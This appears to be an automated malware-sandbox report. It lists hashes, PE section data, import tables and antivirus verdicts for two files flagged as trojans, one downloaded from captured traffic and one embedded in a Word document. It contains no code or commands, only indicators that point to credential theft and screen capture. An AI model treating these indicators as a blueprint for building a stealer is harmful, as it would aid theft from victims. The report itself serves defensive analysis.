kernel32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
Sleep - 0x496728 0x96728 0x93728 0x0
oleaut32.dll (13)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SafeArrayPtrOfIndex - 0x496730 0x96730 0x93730 0x0
SafeArrayPutElement - 0x496734 0x96734 0x93734 0x0
SafeArrayGetElement - 0x496738 0x96738 0x93738 0x0
SafeArrayUnaccessData - 0x49673c 0x9673c 0x9373c 0x0
SafeArrayAccessData - 0x496740 0x96740 0x93740 0x0
SafeArrayGetUBound - 0x496744 0x96744 0x93744 0x0
SafeArrayGetLBound - 0x496748 0x96748 0x93748 0x0
SafeArrayCreate - 0x49674c 0x9674c 0x9374c 0x0
VariantChangeType - 0x496750 0x96750 0x93750 0x0
VariantCopyInd - 0x496754 0x96754 0x93754 0x0
VariantCopy - 0x496758 0x96758 0x93758 0x0
VariantClear - 0x49675c 0x9675c 0x9375c 0x0
VariantInit - 0x496760 0x96760 0x93760 0x0
ole32.dll (4)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CoTaskMemAlloc - 0x496768 0x96768 0x93768 0x0
CoCreateInstance - 0x49676c 0x9676c 0x9376c 0x0
CoUninitialize - 0x496770 0x96770 0x93770 0x0
CoInitialize - 0x496774 0x96774 0x93774 0x0
oleaut32.dll (4)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateErrorInfo - 0x49677c 0x9677c 0x9377c 0x0
GetErrorInfo - 0x496780 0x96780 0x93780 0x0
SetErrorInfo - 0x496784 0x96784 0x93784 0x0
SysFreeString - 0x496788 0x96788 0x93788 0x0
comctl32.dll (24)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ImageList_SetIconSize - 0x496790 0x96790 0x93790 0x0
ImageList_GetIconSize - 0x496794 0x96794 0x93794 0x0
ImageList_Write - 0x496798 0x96798 0x93798 0x0
ImageList_Read - 0x49679c 0x9679c 0x9379c 0x0
ImageList_GetDragImage - 0x4967a0 0x967a0 0x937a0 0x0
ImageList_DragShowNolock - 0x4967a4 0x967a4 0x937a4 0x0
ImageList_SetDragCursorImage - 0x4967a8 0x967a8 0x937a8 0x0
ImageList_DragMove - 0x4967ac 0x967ac 0x937ac 0x0
ImageList_DragLeave - 0x4967b0 0x967b0 0x937b0 0x0
ImageList_DragEnter - 0x4967b4 0x967b4 0x937b4 0x0
ImageList_EndDrag - 0x4967b8 0x967b8 0x937b8 0x0
ImageList_BeginDrag - 0x4967bc 0x967bc 0x937bc 0x0
ImageList_Remove - 0x4967c0 0x967c0 0x937c0 0x0
ImageList_DrawEx - 0x4967c4 0x967c4 0x937c4 0x0
ImageList_Replace - 0x4967c8 0x967c8 0x937c8 0x0
ImageList_Draw - 0x4967cc 0x967cc 0x937cc 0x0
ImageList_GetBkColor - 0x4967d0 0x967d0 0x937d0 0x0
ImageList_SetBkColor - 0x4967d4 0x967d4 0x937d4 0x0
ImageList_ReplaceIcon - 0x4967d8 0x967d8 0x937d8 0x0
ImageList_Add - 0x4967dc 0x967dc 0x937dc 0x0
ImageList_GetImageCount - 0x4967e0 0x967e0 0x937e0 0x0
ImageList_Destroy - 0x4967e4 0x967e4 0x937e4 0x0
ImageList_Create - 0x4967e8 0x967e8 0x937e8 0x0
InitCommonControls - 0x4967ec 0x967ec 0x937ec 0x0
winmm.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
sndPlaySoundA - 0x4967f4 0x967f4 0x937f4 0x0
94e60de577c84625da69f785ffe7e24c889bfa6923dc7b017c21e8a313e4e8e1 Downloaded File Binary
malicious
...
»
Parent File analysis.pcap
MIME Type application/vnd.microsoft.portable-executable
File Size 267.01 KB
MD5 77be0dd6570301acac3634801676b5d7 Copy to Clipboard
SHA1 7394632d8cfc00c35570d219e49de63076294b6b Copy to Clipboard
SHA256 94e60de577c84625da69f785ffe7e24c889bfa6923dc7b017c21e8a313e4e8e1 Copy to Clipboard
SSDeep 6144:VMWdTMYHqhElscw4liVM1LDtG8esyh3hNn+:TdTJqWrEVcDYxN+ Copy to Clipboard
ImpHash cb664df5fa904736e15ac44ff006d780 Copy to Clipboard
File Reputation Information
»
Verdict
malicious
AV Matches (1)
»
Threat Name Verdict
Trojan.GenericKD.45628116
malicious
PE Information
»
Image Base 0x400000
Entry Point 0x401480
Size Of Code 0x35200
Size Of Initialized Data 0x42800
Size Of Uninitialized Data 0x600
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 1970-01-01 00:00:00+00:00
Sections (8)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x35064 0x35200 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.53
.data 0x437000 0x38 0x200 0x35600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.51
.rdata 0x438000 0x2e68 0x3000 0x35800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ 6.83
/4 0x43b000 0x8fd8 0x9000 0x38800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ 4.51
.bss 0x444000 0x440 0x0 0x0 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.0
.idata 0x445000 0xea4 0x1000 0x41800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.98
.CRT 0x446000 0x38 0x200 0x42800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.34
.tls 0x447000 0x8 0x200 0x42a00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.0
Imports (8)
»
KERNEL32.dll (9)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetCurrentProcess - 0x4452b4 0x450b4 0x418b4 0x1c8
GetCurrentProcessId - 0x4452b8 0x450b8 0x418b8 0x1c9
GetCurrentThreadId - 0x4452bc 0x450bc 0x418bc 0x1cd
GetTickCount - 0x4452c0 0x450c0 0x418c0 0x29b
QueryPerformanceCounter - 0x4452c4 0x450c4 0x418c4 0x3b6
TerminateProcess - 0x4452c8 0x450c8 0x418c8 0x4a7
UnhandledExceptionFilter - 0x4452cc 0x450cc 0x418cc 0x4bb
VirtualProtect - 0x4452d0 0x450d0 0x418d0 0x4dc
VirtualQuery - 0x4452d4 0x450d4 0x418d4 0x4df
msvcrt.dll (29)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
__getmainargs - 0x4452dc 0x450dc 0x418dc 0x3b
__initenv - 0x4452e0 0x450e0 0x418e0 0x3c
__lconv_init - 0x4452e4 0x450e4 0x418e4 0x45
__p__acmdln - 0x4452e8 0x450e8 0x418e8 0x4d
__p__fmode - 0x4452ec 0x450ec 0x418ec 0x54
__set_app_type - 0x4452f0 0x450f0 0x418f0 0x69
__setusermatherr - 0x4452f4 0x450f4 0x418f4 0x6c
_amsg_exit - 0x4452f8 0x450f8 0x418f8 0x91
_cexit - 0x4452fc 0x450fc 0x418fc 0xa2
_fmode - 0x445300 0x45100 0x41900 0x114
_fpreset - 0x445304 0x45104 0x41904 0x118
_initterm - 0x445308 0x45108 0x41908 0x160
_iob - 0x44530c 0x4510c 0x4190c 0x164
_onexit - 0x445310 0x45110 0x41910 0x274
abort - 0x445314 0x45114 0x41914 0x421
calloc - 0x445318 0x45118 0x41918 0x42e
exit - 0x44531c 0x4511c 0x4191c 0x439
fprintf - 0x445320 0x45120 0x41920 0x449
free - 0x445324 0x45124 0x41924 0x450
fwrite - 0x445328 0x45128 0x41928 0x45c
malloc - 0x44532c 0x4512c 0x4192c 0x48b
memcmp - 0x445330 0x45130 0x41930 0x493
memcpy - 0x445334 0x45134 0x41934 0x494
memmove - 0x445338 0x45138 0x41938 0x495
memset - 0x44533c 0x4513c 0x4193c 0x496
signal - 0x445340 0x45140 0x41940 0x4af
strlen - 0x445344 0x45144 0x41944 0x4c3
strncmp - 0x445348 0x45148 0x41948 0x4c6
vfprintf - 0x44534c 0x4514c 0x4194c 0x4e5
WS2_32.dll (13)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
WSACleanup - 0x445354 0x45154 0x41954 0x1b
WSAGetLastError - 0x445358 0x45158 0x41958 0x2c
WSASocketW - 0x44535c 0x4515c 0x4195c 0x54
WSAStartup - 0x445360 0x45160 0x41960 0x55
closesocket - 0x445364 0x45164 0x41964 0x87
connect - 0x445368 0x45168 0x41968 0x88
freeaddrinfo - 0x44536c 0x4516c 0x4196c 0x89
getaddrinfo - 0x445370 0x45170 0x41970 0x8a
ioctlsocket - 0x445374 0x45174 0x41974 0x9c
recv - 0x445378 0x45178 0x41978 0xa0
send - 0x44537c 0x4517c 0x4197c 0xa3
setsockopt - 0x445380 0x45180 0x41980 0xa5
shutdown - 0x445384 0x45184 0x41984 0xa6
ADVAPI32.dll (5)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegCloseKey - 0x44538c 0x4518c 0x4198c 0x235
RegEnumKeyExW - 0x445390 0x45190 0x41990 0x254
RegOpenKeyExW - 0x445394 0x45194 0x41994 0x266
RegQueryInfoKeyW - 0x445398 0x45198 0x41998 0x26d
RegQueryValueExW - 0x44539c 0x4519c 0x4199c 0x273
CRYPT32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CryptUnprotectData - 0x4453a4 0x451a4 0x419a4 0xda
GDI32.dll (7)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
BitBlt - 0x4453ac 0x451ac 0x419ac 0xc
CreateCompatibleDC - 0x4453b0 0x451b0 0x419b0 0x22
CreateDIBSection - 0x4453b4 0x451b4 0x419b4 0x27
DeleteObject - 0x4453b8 0x451b8 0x419b8 0x114
GetCurrentObject - 0x4453bc 0x451bc 0x419bc 0x170
GetObjectW - 0x4453c0 0x451c0 0x419c0 0x19e
SelectObject - 0x4453c4 0x451c4 0x419c4 0x1ff
KERNEL32.dll (50)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CloseHandle - 0x4453cc 0x451cc 0x419cc 0x45
CreateDirectoryW - 0x4453d0 0x451d0 0x419d0 0x6f
CreateFileW - 0x4453d4 0x451d4 0x419d4 0x80
CreateProcessA - 0x4453d8 0x451d8 0x419d8 0x95
CreateToolhelp32Snapshot - 0x4453dc 0x451dc 0x419dc 0xab
DeleteCriticalSection - 0x4453e0 0x451e0 0x419e0 0xbe
DeviceIoControl - 0x4453e4 0x451e4 0x419e4 0xcb
EnterCriticalSection - 0x4453e8 0x451e8 0x419e8 0xdc
FindClose - 0x4453ec 0x451ec 0x419ec 0x11b
FindFirstFileW - 0x4453f0 0x451f0 0x419f0 0x126
FindNextFileW - 0x4453f4 0x451f4 0x419f4 0x132
FormatMessageW - 0x4453f8 0x451f8 0x419f8 0x14d
GetComputerNameW - 0x4453fc 0x451fc 0x419fc 0x17b
GetConsoleMode - 0x445400 0x45200 0x41a00 0x18b
GetEnvironmentVariableW - 0x445404 0x45204 0x41a04 0x1c1
GetFileInformationByHandle - 0x445408 0x45208 0x41a08 0x1cd
GetLastError - 0x44540c 0x4520c 0x41a0c 0x1e6
GetLocaleInfoW - 0x445410 0x45210 0x41a10 0x1ea
GetModuleFileNameW - 0x445414 0x45214 0x41a14 0x1f9
GetModuleHandleW - 0x445418 0x45218 0x41a18 0x1fd
GetProcAddress - 0x44541c 0x4521c 0x41a1c 0x231
GetProcessHeap - 0x445420 0x45220 0x41a20 0x237
GetStartupInfoA - 0x445424 0x45224 0x41a24 0x252
GetStdHandle - 0x445428 0x45228 0x41a28 0x255
GetSystemInfo - 0x44542c 0x4522c 0x41a2c 0x266
GetSystemTimeAsFileTime - 0x445430 0x45230 0x41a30 0x26c
GetTempPathW - 0x445434 0x45234 0x41a34 0x279
GetTimeZoneInformation - 0x445438 0x45238 0x41a38 0x28f
GetUserDefaultLocaleName - 0x44543c 0x4523c 0x41a3c 0x295
GlobalMemoryStatusEx - 0x445440 0x45240 0x41a40 0x2ba
HeapAlloc - 0x445444 0x45244 0x41a44 0x2c5
HeapFree - 0x445448 0x45248 0x41a48 0x2c9
HeapReAlloc - 0x44544c 0x4524c 0x41a4c 0x2cc
InitializeCriticalSection - 0x445450 0x45250 0x41a50 0x2da
LeaveCriticalSection - 0x445454 0x45254 0x41a54 0x329
LoadLibraryA - 0x445458 0x45258 0x41a58 0x32d
LocalFree - 0x44545c 0x4525c 0x41a5c 0x33a
Process32First - 0x445460 0x45260 0x41a60 0x387
Process32Next - 0x445464 0x45264 0x41a64 0x389
ReadFile - 0x445468 0x45268 0x41a68 0x3c0
SetFilePointerEx - 0x44546c 0x4526c 0x41a6c 0x430
SetHandleInformation - 0x445470 0x45270 0x41a70 0x43a
SetLastError - 0x445474 0x45274 0x41a74 0x43d
SetUnhandledExceptionFilter - 0x445478 0x45278 0x41a78 0x476
Sleep - 0x44547c 0x4527c 0x41a7c 0x483
TlsAlloc - 0x445480 0x45280 0x41a80 0x494
TlsGetValue - 0x445484 0x45284 0x41a84 0x496
TlsSetValue - 0x445488 0x45288 0x41a88 0x497
WriteConsoleW - 0x44548c 0x4528c 0x41a8c 0x4f2
WriteFile - 0x445490 0x45290 0x41a90 0x4f3
USER32.dll (6)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
EnumDisplayDevicesW - 0x445498 0x45298 0x41a98 0xce
GetDC - 0x44549c 0x4529c 0x41a9c 0x10c
GetDesktopWindow - 0x4454a0 0x452a0 0x41aa0 0x10e
GetKeyboardLayoutList - 0x4454a4 0x452a4 0x41aa4 0x12e
GetSystemMetrics - 0x4454a8 0x452a8 0x41aa8 0x17c
GetWindowRect - 0x4454ac 0x452ac 0x41aac 0x199
jax.k Embedded File Binary
malicious
...
»
Parent File C:\Users\kEecfMwgj\Desktop\0524_4109399728218.doc
MIME Type application/vnd.microsoft.portable-executable
File Size 704.17 KB
MD5 2ea3c764946a151f65efbbbb2ee2f969 Copy to Clipboard
SHA1 9957006c9ccbd8960fb57c264cf666e234a8c2d0 Copy to Clipboard
SHA256 9ce6c2ffdc33040c55cbc1ead970415494022a154b02cee02aded3727faf79d6 Copy to Clipboard
SSDeep 12288:uC69N9C/hMHx8kzFfagPtKEp6E72y/N0hwOGt+gBd8x+6vLrD1agZ:HKHaY8k5faaboEy6r8zz1B Copy to Clipboard
ImpHash 976cbee04383163867f763148191e313 Copy to Clipboard
AV Matches (1)
»
Threat Name Verdict
Gen:Variant.Jacard.222844
malicious
PE Information
»
Image Base 0x400000
Entry Point 0x492348
Size Of Code 0x91400
Size Of Initialized Data 0x1e800
File Type FileType.dll
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 1992-06-19 22:22:17+00:00
Sections (6)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
CODE 0x401000 0x91368 0x91400 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.52
DATA 0x493000 0x17a4 0x1800 0x91800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.33
BSS 0x495000 0xd25 0x0 0x93000 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.0
.idata 0x496000 0x244a 0x2600 0x93000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.79
.reloc 0x499000 0xa918 0xaa00 0x95600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ 6.62
.rsrc 0x4a4000 0x10000 0x10000 0xa0000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ 6.15
Imports (16)
»
kernel32.dll (34)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
DeleteCriticalSection - 0x496154 0x96154 0x93154 0x0
LeaveCriticalSection - 0x496158 0x96158 0x93158 0x0
EnterCriticalSection - 0x49615c 0x9615c 0x9315c 0x0
InitializeCriticalSection - 0x496160 0x96160 0x93160 0x0
VirtualFree - 0x496164 0x96164 0x93164 0x0
VirtualAlloc - 0x496168 0x96168 0x93168 0x0
LocalFree - 0x49616c 0x9616c 0x9316c 0x0
LocalAlloc - 0x496170 0x96170 0x93170 0x0
GetVersion - 0x496174 0x96174 0x93174 0x0
GetCurrentThreadId - 0x496178 0x96178 0x93178 0x0
InterlockedDecrement - 0x49617c 0x9617c 0x9317c 0x0
InterlockedIncrement - 0x496180 0x96180 0x93180 0x0
VirtualQuery - 0x496184 0x96184 0x93184 0x0
WideCharToMultiByte - 0x496188 0x96188 0x93188 0x0
MultiByteToWideChar - 0x49618c 0x9618c 0x9318c 0x0
lstrlenA - 0x496190 0x96190 0x93190 0x0
lstrcpynA - 0x496194 0x96194 0x93194 0x0
LoadLibraryExA - 0x496198 0x96198 0x93198 0x0
GetThreadLocale - 0x49619c 0x9619c 0x9319c 0x0
GetStartupInfoA - 0x4961a0 0x961a0 0x931a0 0x0
GetProcAddress - 0x4961a4 0x961a4 0x931a4 0x0
GetModuleHandleA - 0x4961a8 0x961a8 0x931a8 0x0
GetModuleFileNameA - 0x4961ac 0x961ac 0x931ac 0x0
GetLocaleInfoA - 0x4961b0 0x961b0 0x931b0 0x0
GetCommandLineA - 0x4961b4 0x961b4 0x931b4 0x0
FreeLibrary - 0x4961b8 0x961b8 0x931b8 0x0
FindFirstFileA - 0x4961bc 0x961bc 0x931bc 0x0
FindClose - 0x4961c0 0x961c0 0x931c0 0x0
ExitProcess - 0x4961c4 0x961c4 0x931c4 0x0
WriteFile - 0x4961c8 0x961c8 0x931c8 0x0
UnhandledExceptionFilter - 0x4961cc 0x961cc 0x931cc 0x0
RtlUnwind - 0x4961d0 0x961d0 0x931d0 0x0
RaiseException - 0x4961d4 0x961d4 0x931d4 0x0
GetStdHandle - 0x4961d8 0x961d8 0x931d8 0x0
user32.dll (4)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetKeyboardType - 0x4961e0 0x961e0 0x931e0 0x0
LoadStringA - 0x4961e4 0x961e4 0x931e4 0x0
MessageBoxA - 0x4961e8 0x961e8 0x931e8 0x0
CharNextA - 0x4961ec 0x961ec 0x931ec 0x0
advapi32.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegQueryValueExA - 0x4961f4 0x961f4 0x931f4 0x0
RegOpenKeyExA - 0x4961f8 0x961f8 0x931f8 0x0
RegCloseKey - 0x4961fc 0x961fc 0x931fc 0x0
oleaut32.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SysFreeString - 0x496204 0x96204 0x93204 0x0
SysReAllocStringLen - 0x496208 0x96208 0x93208 0x0
SysAllocStringLen - 0x49620c 0x9620c 0x9320c 0x0
kernel32.dll (6)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
TlsSetValue - 0x496214 0x96214 0x93214 0x0
TlsGetValue - 0x496218 0x96218 0x93218 0x0
TlsFree - 0x49621c 0x9621c 0x9321c 0x0
TlsAlloc - 0x496220 0x96220 0x93220 0x0
LocalFree - 0x496224 0x96224 0x93224 0x0
LocalAlloc - 0x496228 0x96228 0x93228 0x0
advapi32.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegQueryValueExA - 0x496230 0x96230 0x93230 0x0
RegOpenKeyExA - 0x496234 0x96234 0x93234 0x0
RegCloseKey - 0x496238 0x96238 0x93238 0x0
kernel32.dll (69)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
lstrcpyA - 0x496240 0x96240 0x93240 0x0
lstrcmpA - 0x496244 0x96244 0x93244 0x0
WriteFile - 0x496248 0x96248 0x93248 0x0
WaitForSingleObject - 0x49624c 0x9624c 0x9324c 0x0
VirtualQuery - 0x496250 0x96250 0x93250 0x0
VirtualAlloc - 0x496254 0x96254 0x93254 0x0
Sleep - 0x496258 0x96258 0x93258 0x0
SizeofResource - 0x49625c 0x9625c 0x9325c 0x0
SetThreadLocale - 0x496260 0x96260 0x93260 0x0
SetFilePointer - 0x496264 0x96264 0x93264 0x0
SetEvent - 0x496268 0x96268 0x93268 0x0
SetErrorMode - 0x49626c 0x9626c 0x9326c 0x0
SetEndOfFile - 0x496270 0x96270 0x93270 0x0
ResetEvent - 0x496274 0x96274 0x93274 0x0
ReadFile - 0x496278 0x96278 0x93278 0x0
MultiByteToWideChar - 0x49627c 0x9627c 0x9327c 0x0
MulDiv - 0x496280 0x96280 0x93280 0x0
LockResource - 0x496284 0x96284 0x93284 0x0
LoadResource - 0x496288 0x96288 0x93288 0x0
LoadLibraryA - 0x49628c 0x9628c 0x9328c 0x0
LeaveCriticalSection - 0x496290 0x96290 0x93290 0x0
InitializeCriticalSection - 0x496294 0x96294 0x93294 0x0
GlobalUnlock - 0x496298 0x96298 0x93298 0x0
GlobalReAlloc - 0x49629c 0x9629c 0x9329c 0x0
GlobalHandle - 0x4962a0 0x962a0 0x932a0 0x0
GlobalLock - 0x4962a4 0x962a4 0x932a4 0x0
GlobalFree - 0x4962a8 0x962a8 0x932a8 0x0
GlobalFindAtomA - 0x4962ac 0x962ac 0x932ac 0x0
GlobalDeleteAtom - 0x4962b0 0x962b0 0x932b0 0x0
GlobalAlloc - 0x4962b4 0x962b4 0x932b4 0x0
GlobalAddAtomA - 0x4962b8 0x962b8 0x932b8 0x0
GetVersionExA - 0x4962bc 0x962bc 0x932bc 0x0
GetVersion - 0x4962c0 0x962c0 0x932c0 0x0
GetTickCount - 0x4962c4 0x962c4 0x932c4 0x0
GetThreadLocale - 0x4962c8 0x962c8 0x932c8 0x0
GetSystemInfo - 0x4962cc 0x962cc 0x932cc 0x0
GetStringTypeExA - 0x4962d0 0x962d0 0x932d0 0x0
GetStdHandle - 0x4962d4 0x962d4 0x932d4 0x0
GetProcAddress - 0x4962d8 0x962d8 0x932d8 0x0
GetModuleHandleA - 0x4962dc 0x962dc 0x932dc 0x0
GetModuleFileNameA - 0x4962e0 0x962e0 0x932e0 0x0
GetLocaleInfoA - 0x4962e4 0x962e4 0x932e4 0x0
GetLocalTime - 0x4962e8 0x962e8 0x932e8 0x0
GetLastError - 0x4962ec 0x962ec 0x932ec 0x0
GetFullPathNameA - 0x4962f0 0x962f0 0x932f0 0x0
GetDiskFreeSpaceA - 0x4962f4 0x962f4 0x932f4 0x0
GetDateFormatA - 0x4962f8 0x962f8 0x932f8 0x0
GetCurrentThreadId - 0x4962fc 0x962fc 0x932fc 0x0
GetCurrentProcessId - 0x496300 0x96300 0x93300 0x0
GetCPInfo - 0x496304 0x96304 0x93304 0x0
GetACP - 0x496308 0x96308 0x93308 0x0
FreeResource - 0x49630c 0x9630c 0x9330c 0x0
InterlockedExchange - 0x496310 0x96310 0x93310 0x0
FreeLibrary - 0x496314 0x96314 0x93314 0x0
FormatMessageA - 0x496318 0x96318 0x93318 0x0
FindResourceA - 0x49631c 0x9631c 0x9331c 0x0
FindFirstFileA - 0x496320 0x96320 0x93320 0x0
FindClose - 0x496324 0x96324 0x93324 0x0
FileTimeToLocalFileTime - 0x496328 0x96328 0x93328 0x0
FileTimeToDosDateTime - 0x49632c 0x9632c 0x9332c 0x0
EnumCalendarInfoA - 0x496330 0x96330 0x93330 0x0
EnterCriticalSection - 0x496334 0x96334 0x93334 0x0
DeleteFileA - 0x496338 0x96338 0x93338 0x0
DeleteCriticalSection - 0x49633c 0x9633c 0x9333c 0x0
CreateThread - 0x496340 0x96340 0x93340 0x0
CreateFileA - 0x496344 0x96344 0x93344 0x0
CreateEventA - 0x496348 0x96348 0x93348 0x0
CompareStringA - 0x49634c 0x9634c 0x9334c 0x0
CloseHandle - 0x496350 0x96350 0x93350 0x0
version.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
VerQueryValueA - 0x496358 0x96358 0x93358 0x0
GetFileVersionInfoSizeA - 0x49635c 0x9635c 0x9335c 0x0
GetFileVersionInfoA - 0x496360 0x96360 0x93360 0x0
gdi32.dll (70)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
UnrealizeObject - 0x496368 0x96368 0x93368 0x0
StretchBlt - 0x49636c 0x9636c 0x9336c 0x0
SetWindowOrgEx - 0x496370 0x96370 0x93370 0x0
SetWinMetaFileBits - 0x496374 0x96374 0x93374 0x0
SetViewportOrgEx - 0x496378 0x96378 0x93378 0x0
SetTextColor - 0x49637c 0x9637c 0x9337c 0x0
SetStretchBltMode - 0x496380 0x96380 0x93380 0x0
SetROP2 - 0x496384 0x96384 0x93384 0x0
SetPixel - 0x496388 0x96388 0x93388 0x0
SetEnhMetaFileBits - 0x49638c 0x9638c 0x9338c 0x0
SetDIBColorTable - 0x496390 0x96390 0x93390 0x0
SetBrushOrgEx - 0x496394 0x96394 0x93394 0x0
SetBkMode - 0x496398 0x96398 0x93398 0x0
SetBkColor - 0x49639c 0x9639c 0x9339c 0x0
SelectPalette - 0x4963a0 0x963a0 0x933a0 0x0
SelectObject - 0x4963a4 0x963a4 0x933a4 0x0
SaveDC - 0x4963a8 0x963a8 0x933a8 0x0
RestoreDC - 0x4963ac 0x963ac 0x933ac 0x0
Rectangle - 0x4963b0 0x963b0 0x933b0 0x0
RectVisible - 0x4963b4 0x963b4 0x933b4 0x0
